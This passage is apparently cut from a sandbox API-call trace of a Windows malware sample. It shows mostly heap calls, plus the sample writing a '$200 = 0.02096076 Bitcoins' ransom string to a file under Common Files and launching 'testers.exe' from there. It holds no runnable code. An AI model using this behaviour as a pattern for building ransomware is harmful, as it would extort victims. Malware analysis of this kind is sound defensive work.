lpWideCharStr=0xc6b630, cchWideChar=11 | out: lpWideCharStr="0.02096076") returned 11 [0244.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xc6b630 | out: hHeap=0x8a0000) returned 1 [0244.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba510 [0244.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4c8 | out: hHeap=0x8a0000) returned 1 [0244.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23f0 | out: hHeap=0x8a0000) returned 1 [0244.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca00 | out: hHeap=0x8a0000) returned 1 [0244.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2380 | out: hHeap=0x8a0000) returned 1 [0244.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd030 | out: hHeap=0x8a0000) returned 1 [0244.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2f128 | out: hHeap=0x8a0000) returned 1 [0244.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2330 | out: hHeap=0x8a0000) returned 1 [0244.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2f128 [0244.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd030 [0244.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2330 [0244.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd030 | out: hHeap=0x8a0000) returned 1 [0244.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ef70 [0244.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd030 [0244.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca00 [0244.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba510 | out: hHeap=0x8a0000) returned 1 [0244.692] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0244.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2380 [0244.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e23f0 [0244.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba510 [0244.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1860 [0244.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0xc6b630 [0244.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4c8 [0244.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2510 [0244.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0xa3d498 [0244.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4c8 | out: hHeap=0x8a0000) returned 1 [0244.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4c8 [0244.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0xa3f820 [0244.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa3d498 | out: hHeap=0x8a0000) returned 1 [0244.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1860 | out: hHeap=0x8a0000) returned 1 [0244.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4c8 | out: hHeap=0x8a0000) returned 1 [0244.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xc6b630 | out: hHeap=0x8a0000) returned 1 [0244.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23f0 | out: hHeap=0x8a0000) returned 1 [0244.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2380 | out: hHeap=0x8a0000) returned 1 [0244.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4c8 [0244.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba510 | out: hHeap=0x8a0000) returned 1 [0244.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xc423d8 | out: hHeap=0x8a0000) returned 1 [0244.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba510 [0244.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4c8 | out: hHeap=0x8a0000) returned 1 [0244.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db7b0 | out: hHeap=0x8a0000) returned 1 [0244.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba300 | out: hHeap=0x8a0000) returned 1 [0244.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19e0 | out: hHeap=0x8a0000) returned 1 [0244.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc970 | out: hHeap=0x8a0000) returned 1 [0244.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ef98 | out: hHeap=0x8a0000) returned 1 [0244.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a80 | out: hHeap=0x8a0000) returned 1 [0244.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ed40 | out: hHeap=0x8a0000) returned 1 [0244.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd1170 | out: hHeap=0x8a0000) returned 1 [0244.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2540 | out: hHeap=0x8a0000) returned 1 [0244.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca00 | out: hHeap=0x8a0000) returned 1 [0244.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd030 | out: hHeap=0x8a0000) returned 1 [0244.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ef70 | out: hHeap=0x8a0000) returned 1 [0244.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2330 | out: hHeap=0x8a0000) returned 1 [0244.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2f128 | out: hHeap=0x8a0000) returned 1 [0244.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0244.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0244.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0xc423d8 [0244.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xc784d0 [0244.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc940 [0244.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a60 [0244.694] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\0738370262" (normalized: "c:\\progra~2\\common~1\\0738370262"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a0 [0244.695] SetFilePointerEx (in: hFile=0x6a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.695] SetFilePointerEx (in: hFile=0x6a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87fb2c | out: lpNewFilePointer=0x0) returned 1 [0244.695] SetFilePointerEx (in: hFile=0x6a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.695] SetFilePointerEx (in: hFile=0x6a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87fb0c | out: lpNewFilePointer=0x0) returned 1 [0244.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2330 [0244.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xac1f98 [0244.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2540 [0244.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2330 | out: hHeap=0x8a0000) returned 1 [0244.696] SetFilePointerEx (in: hFile=0x6a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87fb1c | out: lpNewFilePointer=0x0) returned 1 [0244.696] ReadFile (in: hFile=0x6a0, lpBuffer=0xc784d0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87fb44, lpOverlapped=0x0 | out: lpBuffer=0xc784d0*, lpNumberOfBytesRead=0x87fb44*=0x0, lpOverlapped=0x0) returned 1 [0244.696] SetFilePointerEx (in: hFile=0x6a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.696] SetFilePointerEx (in: hFile=0x6a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87fb0c | out: lpNewFilePointer=0x0) returned 1 [0244.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2540 | out: hHeap=0x8a0000) returned 1 [0244.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xac1f98 | out: hHeap=0x8a0000) returned 1 [0244.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd030 [0244.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2540 [0244.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="$200 = 0.02096076 Bitcoins", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0244.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1b) returned 0xa2f128 [0244.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="$200 = 0.02096076 Bitcoins", cchWideChar=27, lpMultiByteStr=0xa2f128, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="$200 = 0.02096076 Bitcoins", lpUsedDefaultChar=0x0) returned 27 [0244.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd030 | out: hHeap=0x8a0000) returned 1 [0244.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ef70 [0244.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2f128 | out: hHeap=0x8a0000) returned 1 [0244.697] WriteFile (in: hFile=0x6a0, lpBuffer=0xa2ef70*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x87fb44, lpOverlapped=0x0 | out: lpBuffer=0xa2ef70*, lpNumberOfBytesWritten=0x87fb44*=0x1a, lpOverlapped=0x0) returned 1 [0244.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ef70 | out: hHeap=0x8a0000) returned 1 [0244.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2540 | out: hHeap=0x8a0000) returned 1 [0244.698] CloseHandle (hObject=0x6a0) returned 1 [0244.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0244.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0244.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xc784d0 | out: hHeap=0x8a0000) returned 1 [0244.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xc423d8 | out: hHeap=0x8a0000) returned 1 [0244.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0e20 | out: hHeap=0x8a0000) returned 1 [0244.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1920 | out: hHeap=0x8a0000) returned 1 [0244.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0244.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba060 | out: hHeap=0x8a0000) returned 1 [0244.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa3f820 | out: hHeap=0x8a0000) returned 1 [0244.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2510 | out: hHeap=0x8a0000) returned 1 [0244.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba510 | out: hHeap=0x8a0000) returned 1 [0244.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca48 | out: hHeap=0x8a0000) returned 1 [0244.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2dfd0 | out: hHeap=0x8a0000) returned 1 [0244.700] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0244.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2dfd0 [0244.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca48 [0244.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2510 [0244.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba510 [0244.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1920 [0244.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0xbd1170 [0244.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba060 [0244.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a60 [0244.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0xa3d498 [0244.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba060 | out: hHeap=0x8a0000) returned 1 [0244.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba060 [0244.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0e20 [0244.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa3d498 | out: hHeap=0x8a0000) returned 1 [0244.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba060 | out: hHeap=0x8a0000) returned 1 [0244.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd1170 | out: hHeap=0x8a0000) returned 1 [0244.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1920 | out: hHeap=0x8a0000) returned 1 [0244.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2510 | out: hHeap=0x8a0000) returned 1 [0244.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba060 [0244.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2510 [0244.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 [0244.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1920 [0244.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc940 [0244.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2540 [0244.701] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\2620738370", nBufferLength=0x7fff, lpBuffer=0x86f928, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\2620738370", lpFilePart=0x0) returned 0x1f [0244.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba060 | out: hHeap=0x8a0000) returned 1 [0244.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db7b0 [0244.701] GetFileAttributesW (lpFileName="C:\\PROGRA~2\\COMMON~1\\2620738370" (normalized: "c:\\progra~2\\common~1\\2620738370")) returned 0xffffffff [0244.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba060 [0244.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2330 [0244.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd030 [0244.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a80 [0244.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca00 [0244.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19e0 [0244.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc970 [0244.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2380 [0244.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca00 | out: hHeap=0x8a0000) returned 1 [0244.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ef70 [0244.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e23f0 [0244.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db060 [0244.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd030 | out: hHeap=0x8a0000) returned 1 [0244.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0xa3d498 [0244.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0244.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0xa3d310 [0244.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db060 | out: hHeap=0x8a0000) returned 1 [0244.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23f0 | out: hHeap=0x8a0000) returned 1 [0244.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc970 | out: hHeap=0x8a0000) returned 1 [0244.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2380 | out: hHeap=0x8a0000) returned 1 [0244.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ef70 | out: hHeap=0x8a0000) returned 1 [0244.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19e0 | out: hHeap=0x8a0000) returned 1 [0244.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa3d498 | out: hHeap=0x8a0000) returned 1 [0244.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a80 | out: hHeap=0x8a0000) returned 1 [0244.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba060 | out: hHeap=0x8a0000) returned 1 [0244.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2330 | out: hHeap=0x8a0000) returned 1 [0244.703] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\2620738370", lpFindFileData=0x87f970 | out: lpFindFileData=0x87f970*(dwFileAttributes=0xa3be30, ftCreationTime.dwLowDateTime=0x1, ftCreationTime.dwHighDateTime=0xa3d490, ftLastAccessTime.dwLowDateTime=0x87f994, ftLastAccessTime.dwHighDateTime=0x7738e003, ftLastWriteTime.dwLowDateTime=0x9ba510, ftLastWriteTime.dwHighDateTime=0x9c0e20, nFileSizeHigh=0xa, nFileSizeLow=0xa3d490, dwReserved0=0x87f9a8, dwReserved1=0x759a14dd, cFileName="", cAlternateFileName="")) returned 0xffffffff [0244.703] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0244.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa3d310 | out: hHeap=0x8a0000) returned 1 [0244.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2540 | out: hHeap=0x8a0000) returned 1 [0244.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0244.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1920 | out: hHeap=0x8a0000) returned 1 [0244.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db7b0 | out: hHeap=0x8a0000) returned 1 [0244.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2510 | out: hHeap=0x8a0000) returned 1 [0244.703] GetLastError () returned 0x6 [0244.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0e20 | out: hHeap=0x8a0000) returned 1 [0244.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0244.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba510 | out: hHeap=0x8a0000) returned 1 [0244.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca48 | out: hHeap=0x8a0000) returned 1 [0244.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2dfd0 | out: hHeap=0x8a0000) returned 1 [0244.704] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0244.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a60 [0244.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2dfd0 [0244.704] CharUpperBuffW (in: lpsz="RESTARTSCRIPT", cchLength=0xd | out: lpsz="RESTARTSCRIPT") returned 0xd [0244.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2dfd0 | out: hHeap=0x8a0000) returned 1 [0244.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0244.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bca48 [0244.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db7b0 [0244.704] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0244.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e92d0 [0244.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2510 [0244.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e92d0 | out: hHeap=0x8a0000) returned 1 [0244.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2510 | out: hHeap=0x8a0000) returned 1 [0244.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2510 [0244.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0xbd1170 [0244.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd1170 | out: hHeap=0x8a0000) returned 1 [0244.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2510 | out: hHeap=0x8a0000) returned 1 [0244.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0244.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0xc423d8 [0244.704] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2dfd0 [0244.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba510 [0244.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0244.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 [0244.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0244.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x42) returned 0xc59ee0 [0244.705] GetCurrentDirectoryW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x14 [0244.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2a) returned 0xa3d310 [0244.705] GetCurrentDirectoryW (in: nBufferLength=0x14, lpBuffer=0xa3d310 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0244.705] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x87f918*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x87f8e0 | out: lpCommandLine="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpProcessInformation=0x87f8e0*(hProcess=0x6b8, hThread=0x6a0, dwProcessId=0x530, dwThreadId=0x130)) returned 1 [0244.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xc59ee0 | out: hHeap=0x8a0000) returned 1 [0244.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa3d310 | out: hHeap=0x8a0000) returned 1 [0244.710] CloseHandle (hObject=0x6a0) returned 1 [0244.710] CloseHandle (hObject=0x6b8) returned 1 [0244.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0244.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba510 | out: hHeap=0x8a0000) returned 1 [0244.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2dfd0 | out: hHeap=0x8a0000) returned 1 [0244.710] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xc423d8 | out: hHeap=0x8a0000) returned 1 [0244.710] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db7b0 | out: hHeap=0x8a0000) returned 1 [0244.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca48 | out: hHeap=0x8a0000) returned 1 